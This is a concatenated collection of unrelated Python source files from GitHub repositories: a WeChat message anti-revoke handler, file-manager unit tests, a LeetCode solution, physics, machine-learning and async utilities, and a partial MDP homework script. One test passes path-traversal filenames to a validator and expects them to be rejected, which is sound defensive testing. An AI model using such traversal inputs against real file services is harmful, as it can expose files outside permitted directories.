re.search(\"<location x=\\\"(.*?)\\\" y=\\\"(.*?)\\\".*label=\\\"(.*?)\\\"\", msg['OriContent']).group(1, 2, 3)\n location = \"纬度->\" + str(x) + \" 经度->\" + str(y) + \" \" + location\n msgContent = location\n elif msg['Type'] in [CARD]:\n msgContent = msg['RecommendInfo']['NickName'] + u' 的名片'\n else:\n msgContent = msg['Text']\n\n self.msgLibrayDic.update({\n msgId: {\n \"msgFromUserId\" : msgFromUserId,\n \"msgFromNick\" : msgFromNick,\n \"msgCreateTime\" : msgCreateTime, \n \"msgCreateTime_t\" : msgCreateTime_t, \n \"msgType\" : msg['Type'],\n \"msgContent\" : msgContent}\n })\n self.clearTimeoutMsg()\n\n def isRevokeType(self):\n if self.msg['Type'] != 'Note': return False\n ret = 0\n for i in self.revokeFlag:\n ret += self.msg['Content'].find(i)\n if ret == -2: return False\n return True\n\n def response(self, toUserName=None):\n if not self.isRevokeType(): return\n msgId = re.search(r'\\<msgid\\>(.+?)\\<\\/msgid\\>', self.msg['Content']).group(1)\n msgRecorded = self.msgLibrayDic.get(msgId, None)\n if not msgRecorded: return\n explainInfo = u\"%s %s 撤回了一条%s消息\" % (msgRecorded[\"msgCreateTime_t\"], msgRecorded[\"msgFromNick\"], msgRecorded[\"msgType\"])\n toUserName = toUserName or msgRecorded['msgFromUserId']\n send(explainInfo, toUserName)\n if msgRecorded['msgType'] in [PICTURE, RECORDING, ATTACHMENT, VIDEO]:\n send('@%s@%s' % \n ('img' if msgRecorded['msgType'] == 'Picture' else 'fil', msgRecorded['msgContent']), \n toUserName\n )\n os.remove(msgRecorded['msgContent'])\n elif msgRecorded['msgType'] in [TEXT, MAP, CARD, SHARING]:\n send(msgRecorded['msgContent'], toUserName = toUserName or msgRecorded['msgFromUserId'])\n\n item = self.msgLibrayDic.pop(msgId)\n wechatLog.debug(u'already return: ' + item['msgContent'])\n self.clearTimeoutMsg()\n return None\n\n def clearTimeoutMsg(self):\n if not self.msgLibrayDic: return\n # a dict cannot be modified while iterating over it (RuntimeError: dictionary changed size during iteration)\n for msgId in list(self.msgLibrayDic): \n if time.time() - self.msgLibrayDic[msgId]['msgCreateTime'] > self.timeout: #time out\n item = self.msgLibrayDic.pop(msgId)\n wechatLog.debug(u'time out msg: ' + item['msgContent'])\n if item['msgType'] in [PICTURE, RECORDING, ATTACHMENT, VIDEO]:\n wechatLog.debug(u'need 
to delete file: ' + item['msgContent'])\n os.remove(item['msgContent'])\n\n def timeTodate(self, timeStamp):\n timeObj = time.localtime(timeStamp)\n readTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", timeObj)\n return readTime\n\n\n\nrevoke = Revoke()\n\n","repo_name":"aijialin/wechatManager","sub_path":"servers/vendor/banRevoke.py","file_name":"banRevoke.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"73262002642","text":"import unittest, os, tempfile, shutil\nfrom iktomi.db.files import TransientFile, PersistentFile, \\\n FileManager, ReadonlyFileManager\nfrom webob import Request\nfrom io import BytesIO\n\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n\n\nclass SqlaFilesTests(unittest.TestCase):\n\n def setUp(self):\n\n self.transient_root = tempfile.mkdtemp()\n self.persistent_root = tempfile.mkdtemp()\n self.transient_url = '/transient/'\n self.persistent_url = '/media/'\n\n self.file_manager = FileManager(self.transient_root,\n self.persistent_root,\n self.transient_url,\n self.persistent_url)\n\n self.ro_file_manager = ReadonlyFileManager(self.persistent_root,\n self.persistent_url)\n\n def tearDown(self):\n shutil.rmtree(self.transient_root)\n shutil.rmtree(self.persistent_root)\n\n\n def test_file_attrs(self):\n with open(os.path.join(self.transient_root, 'testfile.html'), 'w') as f:\n f.write('')\n\n fl = TransientFile(self.transient_root, 'testfile.html', self.file_manager)\n\n self.assertEqual(fl.mimetype, 'text/html')\n self.assertEqual(fl.size, 13)\n self.assertEqual(fl.file_name, 'testfile.html')\n self.assertEqual(fl.ext, '.html')\n self.assertEqual(fl.url, '/transient/testfile.html')\n\n def test_repr(self):\n with open(os.path.join(self.transient_root, 'testfile.html'), 'w') as f:\n f.write('')\n\n fl = TransientFile(self.transient_root, 'testfile.html', self.file_manager)\n represent = repr(fl)\n self.assertIn('TransientFile', represent)\n self.assertIn('testfile.html', represent)\n\n def test_no_file(self):\n fl = PersistentFile(self.persistent_root, 'testfile2.html', self.file_manager)\n\n self.assertEqual(fl.mimetype, 'text/html')\n self.assertEqual(fl.size, None)\n self.assertEqual(fl.file_name, 'testfile2.html')\n self.assertEqual(fl.ext, '.html')\n self.assertEqual(fl.url, '/media/testfile2.html')\n\n def test_delete(self):\n with open(os.path.join(self.transient_root, 'delfile1.html'), 'w') as f:\n f.write('')\n\n fl1 = TransientFile(self.transient_root, 'delfile1.html', self.file_manager)\n fl2 = TransientFile(self.transient_root, 'delfile2.html', self.file_manager)\n\n self.assertTrue(os.path.isfile(fl1.path))\n self.assertFalse(os.path.isfile(fl2.path))\n\n log = []\n with patch('logging.Logger.warning',\n side_effect=lambda m: log.append(m)):\n self.file_manager.delete(fl1)\n self.file_manager.delete(fl2)\n\n self.assertFalse(os.path.isfile(fl1.path))\n self.assertFalse(os.path.isfile(fl2.path))\n self.assertIn('delfile2.html', log[0])\n self.assertIn('was not found', log[0])\n\n def test_delete_error(self):\n path = os.path.join(self.transient_root, 'delfile1.html')\n with open(path, 'w') as f:\n f.write('')\n\n fl1 = TransientFile(self.transient_root, 'delfile1.html', self.file_manager)\n self.assertTrue(os.path.isfile(fl1.path))\n log = []\n\n # mocking permission error\n def unlink_error(path):\n raise OSError(\"[Errno 13] Permission denied: {}\".format(path))\n\n with patch('logging.Logger.error',\n 
side_effect=lambda m: log.append(m)):\n with patch('os.unlink', side_effect=unlink_error):\n with self.assertRaises(OSError) as exc:\n self.file_manager.delete(fl1)\n\n def test_readonly_file_manager(self):\n get_persistent = self.ro_file_manager.get_persistent\n\n fl = get_persistent('name.txt')\n self.assertIsInstance(fl, PersistentFile)\n self.assertEqual(self.ro_file_manager.get_persistent_url(fl), '/media/name.txt')\n\n\n self.assertRaises(ValueError, get_persistent, 'something/../name.txt')\n self.assertRaises(ValueError, get_persistent, '/something/name.txt')\n self.assertRaises(ValueError, get_persistent, '~/something/name.txt')\n\n\n def test_create_transient(self):\n req_fl = os.path.join(self.transient_root, 'xxxxx.html')\n with open(req_fl, 'w') as f:\n f.write('' * 10000)\n\n with open(req_fl) as f:\n request = Request.blank('/', POST={'file': ('big.html', f)})\n\n fl = self.file_manager.create_transient(request.POST['file'].file,\n request.POST['file'].name)\n\n self.assertEqual(fl.size, 130000)\n\n # XXX this is a test of strange behaviour when browser does not\n # pass Content-Length header when uploading a file in POST body\n # See iktomi.cms.ajax_file_upload\n # There is no obvious way to simulate this behaviour except\n # hardcoded length variable.\n with open(req_fl, 'w') as f:\n f.write('' * 10000)\n\n with open(req_fl) as f:\n request = Request.blank('/', POST={'file': ('big.html', f)})\n\n fl = self.file_manager.create_transient(request.POST['file'].file,\n request.POST['file'].name,\n length=130000)\n\n self.assertEqual(fl.size, 130000)\n\n def test_create_transient_dir(self):\n req_fl = os.path.join(self.transient_root, 'xxxxx.html')\n with open(req_fl, 'w') as f:\n f.write('' * 10000)\n\n nonexistent_dir = os.path.join(self.transient_root,\n \"non/existent/dir\")\n\n self.assertFalse(os.path.exists(nonexistent_dir))\n\n self.file_manager.transient_root = nonexistent_dir\n\n with open(req_fl) as f:\n request = Request.blank('/', POST={'file': ('big.html', f)})\n fl = self.file_manager.create_transient(request.POST['file'].file,\n request.POST['file'].name)\n\n self.assertEqual(fl.path, os.path.join(nonexistent_dir, fl.name))\n self.assertEqual(fl.size, 130000)\n\n def test_create_symlink(self):\n stream1 = BytesIO(b'hello')\n stream2 = BytesIO(b'world')\n\n source1 = self.file_manager.create_transient(stream1, 'hello.txt')\n source2 = self.file_manager.create_transient(stream2, 'world.txt')\n\n target_file_dir = os.path.join(self.persistent_root, 'dir/subdir')\n target_file = PersistentFile(target_file_dir, 'target.txt')\n target_file_path = os.path.join(target_file_dir, 'target.txt')\n self.assertFalse(os.path.isfile(target_file_path))\n\n self.file_manager.create_symlink(source1, target_file)\n\n self.assertTrue(os.path.isfile(target_file_path))\n\n with open(target_file_path) as f:\n self.assertEqual('hello', f.read())\n\n self.file_manager.create_symlink(source2, target_file)\n\n self.assertTrue(os.path.isfile(target_file_path))\n\n with open(target_file_path) as f:\n self.assertEqual('world', f.read())\n","repo_name":"SmartTeleMax/iktomi","sub_path":"tests/db/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":7373,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"3"} +{"seq_id":"74674902162","text":"class Solution:\n def minimizeResult(self, expression: str) -> str:\n low = float(\"inf\")\n result = \"\"\n left, right = expression.split(\"+\")\n for i in range(len(left)):\n for j in range(1, 
len(right) + 1):\n formula = left[:i] + \"*(\" + left[i:] + \"+\" + right[:j] + \")*\" + right[j:]\n current = eval(formula.strip(\"*\")) # no trailing/leading *\n if low > current:\n low = current\n result = formula.replace(\"*\", \"\") # judge wants without *\n\n return result\n","repo_name":"stbrumme/leetcode","sub_path":"2232.py","file_name":"2232.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7828699499","text":"\"\"\" Final Project for NE806, Neutronics\n \n Author: Keith Huddleston\n Email: kdhuddle@ksu.edu\n \n Note, expect this file to run for a while!\n Last Edit: Dec. 7, 2020\n\"\"\"\n\n# ============================================================================\n# Import statements\n# ============================================================================\nimport numpy as np\nfrom scipy.special import erf\n\n# Custom files written for project\nfrom Utilities.Utilities import Nuclide\n\n\n# ============================================================================\n# Create Text Files Containing the Doppler Broadened Cross Sections\n# ============================================================================\ndef Doppler(E2, E1, S1, T1, T2, M, m=1.009):\n \"\"\" Doppler-broadens cross-section data from temperature T1 to T2.\n\n Parameters\n ----------\n E2 : array_like\n New energy mesh at which to evaluate cross sections.\n E1 : array_like\n Energy mesh of the reference cross section data.\n S1 : array_like\n Cross section data of reference.\n T1 : Float\n Temperature of the reference cross section data.\n T2 : Float\n New temperature at which to evaluate cross sections.\n M : Float\n Atomic mass of target.\n m : Float\n Atomic mass of projectile, 1.009 for Neutron.\n Returns\n -------\n S2 : array_like\n Re-evaluated cross section data for energies E2 and temperature T2\n\n \"\"\"\n Bk = 8.617*10**-5 # Boltzmann constant, [eV K^-1]\n alpha = (M/m)/(Bk*(T2-T1)) # Alpha term found in Doppler broadening Eqs.\n S2 = np.zeros(len(E2)) # Initialize new cross section data array\n S2_pos = np.zeros(len(E2))\n S2_neg = np.zeros(len(E2))\n \n F0 = lambda a: erf(a)\n H0 = lambda a, b: F0(a) - F0(b)\n \n F1 = lambda a: np.sqrt(1/np.pi) * (1-np.exp(-a**2))\n H1 = lambda a, b: F1(a) - F1(b)\n \n F2 = lambda a: (1/2)*erf(a) - (a/np.sqrt(np.pi))*np.exp(-a**2)\n H2 = lambda a, b: F2(a) - F2(b)\n \n F3 = lambda a: np.sqrt(1/np.pi) * (1-(1+a**2)*np.exp(-a**2))\n H3 = lambda a, b: F3(a) - F3(b)\n \n F4 = lambda a: (3/4)*erf(a) - np.sqrt(1/np.pi)*((3*a/2)+a**3)*np.exp(-a**2)\n H4 = lambda a, b: F4(a) - F4(b)\n \n def Af(E1, E2, S1, S2):\n den = (E2 - E1)\n num = (E2*S1) - (E1*S2)\n return num/den\n \n def Cf(E1, E2, S1, S2, alpha):\n den = (E2 - E1)*alpha\n num = (S2 - S1)\n return num/den\n \n # Evaluate Doppler-broadened cross section at specified energy E2[i]\n for i in range(len(E2)):\n S2i = 0\n y = [-1*np.sqrt(alpha*E2[i]), np.sqrt(alpha*E2[i])]\n for j in range(len(y)):\n Ek1 = E1[:-1]\n Ek2 = E1[1:]\n Sk1 = S1[:-1]\n Sk2 = S1[1:] \n xk1 = np.sqrt(alpha*Ek1)\n xk2 = np.sqrt(alpha*Ek2)\n\n Ak = Af(Ek1, Ek2, Sk1, Sk2)\n Ck = Cf(Ek1, Ek2, Sk1, Sk2, alpha)\n\n Zk1 = xk1 - y[j]\n Zk2 = xk2 - y[j]\n\n H0k = H0(Zk2, Zk1)\n H1k = H1(Zk2, Zk1)\n H2k = H2(Zk2, Zk1)\n H3k = H3(Zk2, Zk1)\n H4k = H4(Zk2, Zk1)\n\n S2i = H4k * (Ck) \\\n + H3k * (4*Ck*y[j]) \\\n + H2k * (Ak+6*Ck*y[j]**2) \\\n + H1k * (2*Ak*y[j]+4*Ck*y[j]**3) \\\n + H0k * (Ak*y[j]**2+Ck*y[j]**4)\n S2i = sum(S2i)\n if j == 0:\n S2_neg[i] = S2i/2/y[j]**2\n else:\n 
S2_pos[i] = S2i/2/y[j]**2\n S2 = S2_pos - S2_neg\n return S2\n\ndef Make_Doppler_Data(Nuclide, Temp, Energy=None):\n print('='*79 + '\\nDoppler Broadening ' + Nuclide.N + ' Data' + '\\n' + \\\n '='*79 + '\\n')\n data_type = ['ES', 'Total', 'Fission']\n for i in Temp:\n print('Broadening Data for Temperature ' + str(i) + \\\n '[\\N{DEGREE SIGN}K]...\\n')\n NEM = [0, 0, 0]\n NXS = [0, 0, 0]\n for j in range(3):\n if Nuclide.B[j]:\n E1 = Nuclide.e[300][j]\n XS = Nuclide.s[300][j]\n NXS[j] = Doppler(E1, E1, XS, 300, i, Nuclide.M)\n NEM[j] = E1\n \n Nuclide.e[i] = NEM\n Nuclide.s[i] = NXS\n \n print('Saving Broadened Data to .txt files\\n')\n for j in range(3):\n data = np.vstack(np.transpose([NEM[j], NXS[j]]))\n if Nuclide.B[j]:\n file_name = 'Data/Doppler/' + Nuclide.N + '_' + \\\n data_type[j] + '_' + str(i) + '.txt'\n np.savetxt(file_name, data, delimiter=',')\n print('Finished Broadening ' + Nuclide.N + ' Data\\n')\n \n# ============================================================================\n# Load and Doppler-Broaden Data\n# ============================================================================\n# Note, the data we are performing Doppler Broadening on are the interpreted\n# plot data from the BNL website, which are at 300 K. \nif __name__ == \"__main__\":\n # Temperature values to Doppler-Broaden to\n Temps = [600, 900, 1200]\n \n # Define the objects for containing data for H1, O16, U_235, U_238 \n H1 = Nuclide('H1', 1, 1.008, [1, 1, 0])\n O16 = Nuclide('O16', 16, 15.995, [1, 1, 0])\n U235 = Nuclide('U235', 235, 235.044, [1, 1, 1])\n U238 = Nuclide('U238', 238, 238.051, [1, 1, 1])\n \n # Doppler-Broaden Data\n Make_Doppler_Data(H1, Temps)\n Make_Doppler_Data(O16, Temps)\n Make_Doppler_Data(U235, Temps)\n Make_Doppler_Data(U238, Temps)\n\n","repo_name":"keithhuddleston/NE806","sub_path":"Homework/Project/Doppler_Data.py","file_name":"Doppler_Data.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7385476436","text":"import os\nimport argparse\nimport torch\nimport yaml\n\nfrom torch.utils.data.dataloader import DataLoader\n\nfrom torchvision.transforms import transforms\nfrom torchvision.datasets import CIFAR10\n\nfrom classifier.tester import Tester\n\ndef argparser():\n args = argparse.ArgumentParser()\n\n args.add_argument('--model_name', type=str, help='File name of the model to be used during testing', required=True)\n args.add_argument('--device', type=str, default='cuda:0', choices=['cuda:0', 'cpu'], help='Specify the device on which executes the training.', required=False)\n args.add_argument('--config', type=str, default='./config/classifier/alexnet_cGAN_epoch100.yaml', help='Path to the configuration file.', required=False)\n\n return args.parse_args()\n\ndef get_config(config: str):\n \"\"\"\n Load the configuration file.\n\n Parameters\n ----------\n config : str\n Path of the configuration file.\n\n Returns\n -------\n The yaml configuration file parsed.\n \"\"\"\n\n with open(config, 'r') as f:\n return yaml.load(f, Loader=yaml.FullLoader)\n\n\ndef main(args):\n config = get_config(args.config)\n\n # Resize is fine both for alexnet and resnet\n transformList = transforms.Compose([transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\n\n cifar10_testset = CIFAR10(root=config['dataset_path'],\n train=False,\n transform=transformList,\n download=True)\n\n cifar10_testloader = 
DataLoader(dataset=cifar10_testset,\n batch_size=config['batch_size'],\n shuffle=False,\n num_workers=config['num_workers'])\n\n device = torch.device(args.device if torch.cuda.is_available() else \"cpu\")\n print(f\"Code will be executed on {device}\")\n\n tester = Tester(test_loader=cifar10_testloader,\n device=device,\n args=args,\n config=config)\n\n tester.test()\n\nif __name__ == \"__main__\":\n # To suppress tensorflow warnings\n os.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\n\n args = argparser()\n main(args)","repo_name":"fdaddeo/Data-Augmentation-with-cGANs","sub_path":"test_classifier.py","file_name":"test_classifier.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"25731195569","text":"import asyncio\nfrom functools import partial\nfrom functools import wraps\n\nimport nest_asyncio\nimport uvloop\nfrom more_itertools import divide\nfrom more_itertools import flatten\nfrom tqdm import tqdm\n\n# setup\n\nnest_asyncio.apply()\nuvloop.install()\n\n\ndef with_index(fxn):\n @wraps(fxn)\n def wrapped(i, *args, **kwargs):\n return (i, fxn(*args, **kwargs))\n\n return wrapped\n\n\nasync def exec_async_fxn(\n fxn, arg_list, kwargs, chunk_size=1, desc=\"\", progress_bar=True\n):\n \"\"\"Executes an asynchronous function.\n\n :param fxn: function to execute in parallel\n :type fxn: callable\n :param arg_list: list of arguments as tuples for each function run\n :type arg_list: list of tuples\n :param kwargs: key-value arguments for each function run\n :type kwargs: dict\n :param chunk_size: number of functions to run for each worker\n :type chunk_size: int\n :param desc: description\n :type desc: basestring\n :param progress_bar: whether to display tqdm progress bar\n :type progress_bar: boolean\n :return: list of results in same order as arg_list\n :rtype: list\n \"\"\"\n # run asynchronously\n\n loop = asyncio.get_event_loop()\n partial_fxn = partial(with_index(fxn), **kwargs)\n futures = [\n loop.run_in_executor(None, partial_fxn, i, *args)\n for i, args in enumerate(arg_list)\n ]\n\n # collect results\n results = []\n\n iterator = asyncio.as_completed(futures)\n if progress_bar:\n iterator = tqdm(iterator, desc=desc, total=len(futures), unit_scale=chunk_size)\n\n for f in iterator:\n results.append(await f)\n results = sorted(results, key=lambda x: x[0])\n return [r[1] for r in results]\n\n\ndef asyncfunc(fxn, arg_list, kwargs=None, chunk_size=1, progress_bar=True, desc=None):\n \"\"\"Runs a function asynchronously.\n\n :param fxn: function to run asynchronously\n :type fxn: function or lambda\n :param arg_chunks: arguments to apply to the function; suggested to divide list\n into chunks\n :type arg_chunks: list\n :return: result\n :rtype: list\n \"\"\"\n if kwargs is None:\n kwargs = {}\n # finish loop\n loop = asyncio.get_event_loop()\n if desc is None:\n desc = desc\n results = loop.run_until_complete(\n exec_async_fxn(\n fxn,\n arg_list,\n kwargs=kwargs,\n desc=desc,\n progress_bar=progress_bar,\n chunk_size=chunk_size,\n )\n )\n # loop.close()\n return results\n\n\ndef make_async(\n chunk_size, progress_bar=True, as_classmethod=False, data_pos=0, return_type=list\n):\n \"\"\"Wrapper to make a function run asynchrounously.\n\n :param chunk_size: size of array to apply to each worker\n :type chunk_size: int\n :param progress_bar: whether to display a progress bar\n :type progress_bar: bool\n :param as_classmethod: whether to pass in the first argument as a instance for\n instance 
or classmethods\n :type as_classmethod: bool\n :param data_pos: position in arguments where list of data is\n :type data_pos: int\n :return: results\n :rtype: list\n \"\"\"\n\n def dec(fxn):\n data_position = data_pos\n if as_classmethod:\n data_position += 1\n\n @wraps(fxn)\n def wrapper(*args, **kwargs):\n data = args[data_position]\n post_data_args = args[data_position + 1 :]\n pre_data_args = args[:data_position]\n chunks = divide(chunk_size, data)\n arg_list = [pre_data_args + (c,) + post_data_args for c in chunks]\n desc = 'Running \"{}\" [size: {}, num: {}]: '.format(\n fxn.__name__, chunk_size, len(chunks)\n )\n results = asyncfunc(\n fxn, arg_list, kwargs=kwargs, progress_bar=progress_bar, desc=desc\n )\n if all([r is None for r in results]):\n return None\n try:\n iter_results = flatten(results)\n except TypeError:\n iter_results = results\n if return_type:\n return return_type(iter_results)\n return results\n\n return wrapper\n\n return dec\n","repo_name":"jvrana/Terrarium","sub_path":"terrarium/utils/async_wrapper.py","file_name":"async_wrapper.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"37267559156","text":"import matplotlib\n# Force matplotlib to not use any Xwindows backend.\nmatplotlib.use('Agg')\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nimport collections\n\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\nimport datetime\n\n# This is needed to display the images.\n#%matplotlib inline\n\n# This is needed since the notebook is stored in the object_detection folder.\nsys.path.append(\"..\")\n\nfrom utils import label_map_util\n\nfrom utils import visualization_utils as vis_util\n\n# What model to download.\n#MODEL_NAME = 'ssd_mobilenet_v1_coco_11_06_2017'\nMODEL_NAME = '.\\\\mo'\nMODEL_FILE = MODEL_NAME + '.tar.gz'\nDOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'\n\n# Path to frozen detection graph. 
This is the actual model that is used for the object detection.\nPATH_TO_CKPT = MODEL_NAME + '\\\\frozen_inference_graph.pb'\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join('data', '6675_label_map.pbtxt')\n\nNUM_CLASSES = 12\n\n#opener = urllib.request.URLopener()\n#opener.retrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)\n#tar_file = tarfile.open(MODEL_FILE)\n#tar_file = tarfile.open('./m/' + MODEL_FILE)\n#for file in tar_file.getmembers():\n# file_name = os.path.basename(file.name)\n# if 'frozen_inference_graph.pb' in file_name:\n# tar_file.extract(file, os.getcwd())\n\nstarttime = datetime.datetime.now()\n\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\ndef find_on_image_array(image,\n boxes,\n classes,\n scores,\n category_index,\n instance_masks=None,\n keypoints=None,\n use_normalized_coordinates=False,\n max_boxes_to_draw=20,\n min_score_thresh=.5,\n agnostic_mode=False,\n line_thickness=4,\n target_classes = [1]):\n \"\"\"Overlay labeled boxes on an image with formatted scores and label names.\n\n This function groups boxes that correspond to the same location\n and creates a display string for each detection and overlays these\n on the image. Note that this function modifies the image array in-place\n and does not return anything.\n\n Args:\n image: uint8 numpy array with shape (img_height, img_width, 3)\n boxes: a numpy array of shape [N, 4]\n classes: a numpy array of shape [N]\n scores: a numpy array of shape [N] or None. If scores=None, then\n this function assumes that the boxes to be plotted are groundtruth\n boxes and plot all boxes as black with no classes or scores.\n category_index: a dict containing category dictionaries (each holding\n category index `id` and category name `name`) keyed by category indices.\n instance_masks: a numpy array of shape [N, image_height, image_width], can\n be None\n keypoints: a numpy array of shape [N, num_keypoints, 2], can\n be None\n use_normalized_coordinates: whether boxes is to be interpreted as\n normalized coordinates or not.\n max_boxes_to_draw: maximum number of boxes to visualize. If None, draw\n all boxes.\n min_score_thresh: minimum score threshold for a box to be visualized\n agnostic_mode: boolean (default: False) controlling whether to evaluate in\n class-agnostic mode or not. 
This mode will display scores but ignore\n classes.\n line_thickness: integer (default: 4) controlling line width of the boxes.\n \"\"\"\n # Create a display string (and color) for every box location, group any boxes\n # that correspond to the same location.\n box_to_display_str_map = collections.defaultdict(list)\n box_to_color_map = collections.defaultdict(str)\n box_to_instance_masks_map = {}\n box_to_keypoints_map = collections.defaultdict(list)\n result_map = {}\n for i in target_classes:\n result_map[i] = 0\n if not max_boxes_to_draw:\n max_boxes_to_draw = boxes.shape[0]\n for i in range(min(max_boxes_to_draw, boxes.shape[0])):\n if scores is None or scores[i] > min_score_thresh:\n box = tuple(boxes[i].tolist())\n if instance_masks is not None:\n box_to_instance_masks_map[box] = instance_masks[i]\n if keypoints is not None:\n box_to_keypoints_map[box].extend(keypoints[i])\n if scores is None:\n box_to_color_map[box] = 'black'\n else:\n if not agnostic_mode:\n #print (classes[i])\n if classes[i] in category_index.keys():\n if classes[i] in target_classes:\n result_map[classes[i]] = result_map[classes[i]] + 1;\n return result_map\n\n# For the sake of simplicity we will use only 2 images:\n# image1.jpg\n# image2.jpg\n# If you want to test the code with your images, just add path to the images to the TEST_IMAGE_PATHS.\nPATH_TO_TEST_IMAGES_DIR = 'C:\\\\Users\\\\gx\\\\Downloads\\\\images\\\\images\\\\painting'\nfilenames = os.listdir(PATH_TO_TEST_IMAGES_DIR)\nTEST_IMAGE_PATHS = [ os.path.join(PATH_TO_TEST_IMAGES_DIR, i) for i in filenames ]\n\n# Size, in inches, of the output images.\nIMAGE_SIZE = (12, 8)\n\nwith detection_graph.as_default():\n with tf.Session(graph=detection_graph) as sess:\n # Definite input and output Tensors for detection_graph\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n target_classes = []\n for i in range(1, 13):\n target_classes.append(i)\n for i in range(21291, len(TEST_IMAGE_PATHS)):\n image_path = TEST_IMAGE_PATHS[i]\n #print(image_path)\n image = Image.open(image_path)\n # the array based representation of the image will be used later in order to prepare the\n # result image with boxes and labels on it.\n image_np = load_image_into_numpy_array(image)\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n # Actual detection.\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n # Visualization of the results of a detection.\n result = find_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=8,\n target_classes=target_classes)\n line = str(os.path.basename(image_path))\n #print(result)\n for i in target_classes:\n line = line + \",\"\n line = line + str(result[i])\n print 
(line)","repo_name":"ShwanWu/CSE6242-Data-and-Visual-Analytics","sub_path":"Art Gallery/tensorflow/myrun.py","file_name":"myrun.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20571495887","text":"from app.core.model import register_model\nfrom app.core.pipeline import PipelineModel\n\n\n@register_model(\"zeroshot_classifier_model\")\nclass ZeroShotClassifierModel(PipelineModel):\n pipeline_name = \"zeroshot\"\n\n def _pre_process(self, payload):\n # See\n # https://huggingface.co/transformers/main_classes/pipelines.html#zeroshotclassificationpipeline\n return {\n \"params\": {\n \"pipeline_params\": {\n \"sequences\": payload.text,\n \"candidate_labels\": payload.candidate_labels,\n }\n }\n }\n\n def _post_process(self, result):\n prediction = result[\"result\"]\n # {'labels': ['technology', 'politics', 'sports'],\n # 'scores': [0.9663877487182617, 0.017997432500123978,\n # 0.015614871867001057],\n # 'sequence': 'Apple just announced the newest iPhone X'}\n\n threshold = self.pipeline_config.get(\"threshold\", 0.5)\n\n scores = dict(zip(prediction[\"labels\"], prediction[\"scores\"]))\n result = []\n for label, score in scores.items():\n if score > threshold:\n result.append({\"label\": label, \"score\": score})\n\n return {\"labels\": list(sorted(result, key=lambda x: x[\"score\"]))}\n","repo_name":"eea/nlp-service","sub_path":"app/api/zeroshot/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"27105500432","text":"#!/bin/python3\n# CS434 - HW5 \n# Sam Jacobs, Erich Kramer, Markus Woltjer\n#\n#\nimport sys\nimport os.path\nimport numpy as np\nfrom markov import *\n# Build a planner. Value iteration algorithm\n\n#input - MDP and factor discount B, output optimal utility function and policyP for mdp \n#and discount factor\n\n\n#2 Test on provided data with different B values\n\n#ouptut should consist of B, nx1 U and nx1 P\n\n\ndef cmdArgs():\n if len(sys.argv) != 3 :\n print(\"Usage: ./hw5 [filename] [discount factor [0,1]]\")\n exit() \n elif not os.path.exists(sys.argv[1]):\n print(\"Bad filename!\")\n exit()\n else:\n try:\n x = float(sys.argv[2])\n if( x < 0 or x > 1):\n raise ValueError\n except ValueError as error:\n print(\"Bad Discount factor! Must be float between 0 and 1\")\n\n exit()\n return;\n\n#assumes input file is filled with action by state tables for each state\n#readlines probably better than readline() for refactor\ndef getMark(numStates, numActions, fd):\n \n tmp = []\n for x in range(0, numActions):\n tmp.append([])\n fd.readline()\n for y in range(0, numStates):\n tmp[x].append([ float(val) for val in fd.readline().rstrip('\\n').rsplit(' ')])\n #Note: THIS ACCEPTS 